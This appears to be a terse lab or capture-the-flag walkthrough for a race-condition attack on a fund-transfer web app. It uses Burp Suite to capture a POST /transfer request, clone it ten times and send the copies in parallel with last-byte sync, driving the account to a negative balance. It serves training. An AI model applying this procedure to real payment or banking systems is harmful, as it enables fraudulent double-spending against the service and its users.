this attack sends multiple requests to the application in parallel. the application then processes the requests simultaneously without ensuring proper synchronization resulting in unintended actions
#view the application manually and identify attack vectors
root@oco:~$ BROWSER > {targetSite:port} > fund transfer application
#
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /transfer HTTP/1.1
Host: 10.10.68.92:5000
Referer: http://10.10.68.92:5000/dashboard
account_number=111&amount=500
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /transfer HTTP/1.1
Host: 10.10.68.92:5000
Referer: http://10.10.68.92:5000/dashboard
account_number=111&amount=500
#create 10x duplicate request and group the requests into one
BURP > Repeater > CTRL+R x10 > + > Create Tab Group
Group Name: {arbitrary}
Tabs in Group: all
* create 10x of the same request via CTRL+R
- the objective is to send all 10x duplicate requests in parallel
BURP > Repeater > Send Options > Send Group In Parallel (last-byte sync)
* Send Options is enabled via the 'down' arrow on the Send button
- send all 10x request in parallel once ready
BURP > Repeater > Follow Redirection
Response
...
* ALT:
BURP > BROWSER > Refresh
- view the page source to get the flag
- the negative balance should be visible
